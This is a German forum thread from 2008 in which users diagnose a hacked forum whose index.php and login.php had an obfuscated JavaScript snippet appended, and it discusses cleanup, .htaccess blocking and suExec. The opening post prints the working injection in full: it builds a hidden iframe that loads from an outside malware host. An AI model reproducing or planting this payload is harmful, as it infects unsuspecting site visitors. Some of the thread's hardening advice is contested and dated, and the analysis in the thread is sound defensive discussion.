|
Titel: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 20 September 2008, 21:06:54 Wer kann mir erklären, was der folgende Code anstellt?
Code: <!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c --> Heute hatte ich mit einer wbb Bordbetreiberin ein Gespräch, darin bat sie um Hilfe das offensichtlich ihr FTP-Zugang gehackt wurde und die Index.php mit obigen Text erweitert wurde. Weiß hier jemand weiter? Passwörter usw. wurden inzwischen geändert. Bordbesucher hatten immer wieder eine Viruswarnung beim Besuch der Seite bekommen. Dieser Code wurde einfach hinter ?> angehängt. Edit: In der Login.php wurde der selbe Code angehängt. Titel: Re: Gehackter FTP Zugang Beitrag von: schlumpfi am 21 September 2008, 01:00:07 1) ein javascript virus/malware, der von einem anderen server eingebunden wird via iframe und daten ausspioniert. unten stehen die hosts, die dieses abrufen. diese mit htaccess blockieren lassen!!
2) der server ist sehr wahrscheinlich in vielen files kompromitiert (verseucht)... es sollte ein backup eingespielt werden, bevor dieser kompromitiert wurde... falls dieses nicht gelingt, sollte der server neu aufgesetzt werden, da man nicht weis, wo dieser kompromitiert ist 3) ein ftp wurde nicht gehackt. vermutlich (meine meinung) über ein exploit diese codefragmente eingefügt... 4) alle logfiles des server kontrollieren. ggf findet man dort zugriffe und änderungslogs wenn noch fragen sind, bitte posten. detalierte auskunft über diese art des kompromitierten scriptes erteile ich nur via pn... folgendes in der htaccess im root einbinden!!! <filesmatch "(.*)"> Order Allow,Deny Deny from bestgreenstreet.com Deny from rezmas.com Allow from all </filesmatch> ps:// hast ne pn... mfg edit// d.h. kompromitiert, nicht kompiliert ;) Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 21 September 2008, 09:22:22 Genial, das ist detailiert.
Hut ab. Wie kann so etwas eigentlich passieren? Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder? Titel: Re: Gehackter FTP Zugang Beitrag von: schlumpfi am 21 September 2008, 12:00:44 Genial, das ist detailiert. Hut ab. Wie kann so etwas eigentlich passieren? Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder? a) via exploit für das wbb... gibt es on mass zudem kommt noch, das auf der besagten seite unmengen an hacks + addons installiert sind, die wiederum einige sicherheitslücken beinhalten... b) htaccess ja die htaccess ins root legen... mit namenskennung ".htaccess" über die verwendung einer htaccess sollte sich jeder serverbetreiber, egal ob root oder webspace, auseinander setzen. dieses ist, neben der richtigen konfiguration vom server (webspaceanbieter - provider), der erste weg, um sicherheitsprobleme anzugehen... mfg Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 21 September 2008, 17:06:03 Ich kann doch eine php Datei nicht ohne FTP Zugang einfach ändern oder? Selbstverständlich kannst man das - und das beschränkt sich nicht allein auf PHP Dateien.über die verwendung einer htaccess sollte sich jeder serverbetreiber, egal ob root oder webspace, auseinander setzen. Naja ...dieses ist, neben der richtigen konfiguration vom server (webspaceanbieter - provider), der erste weg, um sicherheitsprobleme anzugehen... als den Ersten Weg würde ich das nicht gerade bezeichnen - eher als Krücke. Was soll es bringen, in der .htaccess die zwei im angreifenden Script erkannten Domains zu sperren? Angreifer bedienen sich i.d.R. eines umfangreichen Netzes von Zombie-Rechnern; der nächste Angriff kommt also ganz bestimmt (und auch trotz des Eintrags dieser zwei Domains in die .htaccess). Daneben bilden diese beiden Domains lediglich das Empfängerziel für die ausgespähten Daten (oder eher noch als Adresse für das Nachladen des tatsächlichen Exploids). Der Verursacher des Angriffs ist also gänzlich unbekannt. Das YaBB-Forum zum Beispiel, hat sich im Laufe der vergangenen drei Monate, zweimal einen Code (ähnlich dem w.o.) eingefangen - allerdings nicht über das Script des Forums sondern über die (in PHP geschriebene) Startseite. Ich hatte den Betreiber der Domain seinerzeit darauf aufmerksam gemacht und er teilte mir mit, dass die Virenwarnung erst dann bei ihm angezeigt wurde, als er von seinem Firmenrechner (also von einer anderen IP aus) auf den Foren-Server zugegriffen hat. Ganz schön clever gemacht - oder? Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 21 September 2008, 20:15:40 @schlumpfi
Wenn du dir besagtes Board der USERIN mal angeschaut hast, wirst du evtl. bemerkt haben, dass dort das Security System eingebaut wurde. Anscheinend keine Wirkung. Wenn du auch ein wbbler bist, dann liste ich dir mal die zensierten Worte die man mit der Installation des System´s in das ACP eintragen muß. Nur diese Zensur ist für ein Support-Board wie unseres doch Müll. Wir schreiben ja über und mit diesen Wörten. Titel: Re: Gehackter FTP Zugang Beitrag von: schlumpfi am 22 September 2008, 17:52:02 zum wbb deiner "kundin", sry wenn nicht so ist ;)
hat mit den "badwords" im acp eigentlich nichts zu tun... bad words werden nur abgefangen, wenn user einen beitrag/thread/post sendet, der dieses "bad word" beinhaltet und dann wird dieses ersetzt durch "ersatzwort" exploits werden gezielt auf sicherheitslücken angesetzt, die man genau kennt. wenn das ct sec sys 6 installed ist, gibts nur 2 möglichkeiten... 1) ct sec sys 6 ist nicht richtig installiert... betonung liegt auf richtig/korrekt 2) ct sec sys 6 ist die signatur des exploits noch nicht bekannt. da dort sehr viele hacks installed sind, gehe ich davon aus, das durch einen hack/addon dieses fragment eingefügt wurde, das nicht durch ct sec sys geschützt wurde... um genaueres zu sagen müsste ich admin im forum+ftp sein und einiges testen... hoffe ich konnte helfen ;D mfg Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 22 September 2008, 18:09:17 suExec
sollte auf dem Server installiert und (richtig) eingerichtet sein - dann können keine Scripts verändert werden. Hat sich das noch nicht unter den Providern herumgesprochen? Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 22 September 2008, 22:29:48 @schlumpfi
nein, das ist keine Kundin. Ich habe sie in einem Supportforum kennengelernt als sie danach fragte warum ihr Virenscanner anspringt wenn sie ihre eigene Seite im Internet besucht. Dabei sind wir auf die veränderten Dateien gestoßen. Sie hat das CT Security System Pre installiert. @delta http://de.wikipedia.org/wiki/Mod_suexec denke doch, dass dies inzwischen Standard sein sollte oder? Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 22 September 2008, 22:57:53 @delta Nun - wenn dem so wäre, dann hätte Deine Bekannte sicherlich kein Problem gehabt.http://de.wikipedia.org/wiki/Mod_suexec denke doch, dass dies inzwischen Standard sein sollte oder? Siehe: http://httpd.apache.org/docs/1.3/suexec.html Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 22 September 2008, 23:01:33 Wenn das so ein supper Modul ist, macht es denn dann nicht auch CTXtra in Teilen überflüssig?
Wie ich auch gelesen habe, haben hierzu auch bekannte Hoster differenzierte Meinungen. Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 22 September 2008, 23:17:54 Wenn das so ein supper Modul ist, macht es denn dann nicht auch CTXtra in Teilen überflüssig? In Teilen - Ja!Wie ich auch gelesen habe, haben hierzu auch bekannte Hoster differenzierte Meinungen. Aber nicht alle Hoster haben suExec installiert. Wie Du in der Doku (siehe obigen Link) nachlesen kannst, setzt die Konfiguration einiges an Fachwissen voraus. Wo hast Du die differenzierten Meinungen aufgegriffen? Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 23 September 2008, 06:16:59 Wo hast Du die differenzierten Meinungen aufgegriffen? Nicht aufgegriffen, gelesen. Auf der Suche mit Google "Konfiguration Appache" Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 23 September 2008, 13:35:09 Wo hast Du die differenzierten Meinungen aufgegriffen? Nicht aufgegriffen, gelesen. Auf der Suche mit Google "Konfiguration Appache" http://de.wikipedia.org/wiki/Mod_suexec denke doch, dass dies inzwischen Standard sein sollte oder? warst Du allerdings der Meinung das suExec auf jedem Server installiert sein sollte.Irgendwie weiß ich jetzt nicht so richtig was Du sagen willst. Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 23 September 2008, 14:42:14 Anfangs ja, ich hab mit Serverkofiguration nichts am Hut. Da mußte ich selbst erst nach Input suchen.
Und wenn ich mit XAMPP experimentiere, brauch ich das nicht. Titel: Re: Gehackter FTP Zugang Beitrag von: delta am 23 September 2008, 15:17:18 ich hab mit Serverkofiguration nichts am Hut. Sorry, aber dann solltest Du Dich auch nicht dazu äußern.Sowas trägt nur zur Verunsicherung der User bei. Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 23 September 2008, 16:24:28 Ich denke wenn etwas zur Verunsicherung und Verärgerung beiträgt, dann sind das deine halben Postings hier.
Nicht die Masse macht es. Damit sind diese von der Idee/Vorschlag der Kostenpflichtikkeit bis jetzt zu deinem halbfertigen Beitrag um suExec zu sehen. Das ist nun zum wiederholten Mal eine überflüssigge Bemerkung oder ist das einfach deine Art hier Leute schräg anzugehen? Wenn ich mich mit der Serverkonfiguration nicht auskenne und mir dann entgegen deiner Behauptung über suExec fundierte Beiträge im Internet durchlese/suche und deiner Behauptung widerspreche, dass Webhoster ihre Server falsch einstellen, dann ist dies schon etwas dreist. Und um hier keine Unruhe im Board aufkommen zu lassen, ist es wohl besser deine Beiträge zukünftig zu übergehen oder erst garnicht Stellung zu nehmen. Denn so macht das keinen Sinn. Zukünftig brauchst du dir deshalb keine Mühe mehr machen auf meine Fragen zu antworten. Titel: Re: Gehackter FTP Zugang Beitrag von: schlumpfi am 23 September 2008, 16:29:38 UNd nun ist wieder gut ;)
su exec ist schwer zu configen.... also für fortgeschrittene auch nicht so einfach... zudem hat jedes tool, programm, script seine einschränkungen. nicht jedes kann alles ist gibt zich möglichkeiten seinen server abzusichern, ob mit oder ohne suexec... Titel: Re: Gehackter FTP Zugang Beitrag von: +Jürgen+ am 24 September 2008, 18:52:25 @ schlumpfi
Hier die Antwort des Hosters Sehr geehrte Frau xxxxxx, die schädlichen Inhalte wurden wahrscheinlich ohne Ihr Wissen abgelegt. Typischerweise sind zunächst Ihre eigenen FTP-Zugangsdaten durch einen Trojaner ausspioniert worden. Anschließend wurde die Malware per FTP auf Ihren Webspace geladen. Um das Problem zu beheben, gehen Sie bitte nun wie folgt vor: 1. Prüfen Sie mit einem aktuellen Virenscanner alle Rechner, über die Sie den FTP-Zugang Ihres Accounts genutzt haben. Idealerweise bieten verschiedene Hersteller Rescue CD's an. Somit ist gewährleistet auch die Viren/Trojaner zu finden die versteckt in Ihrem System laufen. 2. Überprüfen Sie den Quelltext der oben angegebenen Seite auf auffälligen bzw. fremden Code (Java-Script oder IFrames) und entfernen Sie diesen. Sollte der angegebene Link eine Datei sein, löschen Sie diese. 3. Ändern Sie sofort Ihre FTP-Zugangsdaten. Titel: Re: Gehackter FTP Zugang Beitrag von: oolicks_rNb am 25 September 2009, 15:26:48 Die verwendung einer htaccess sollte sich jeder serverbetreiber, egal ob root oder webspace, auseinander setzen. dieses ist, neben der richtigen konfiguration vom server webspaceanbieter provider, der erste weg, um sicherheitsprobleme anzugehen.
___________________________ Computer Reparatur System (http://www.bestegutscheine.at/Categories/Computer_and_Software/) |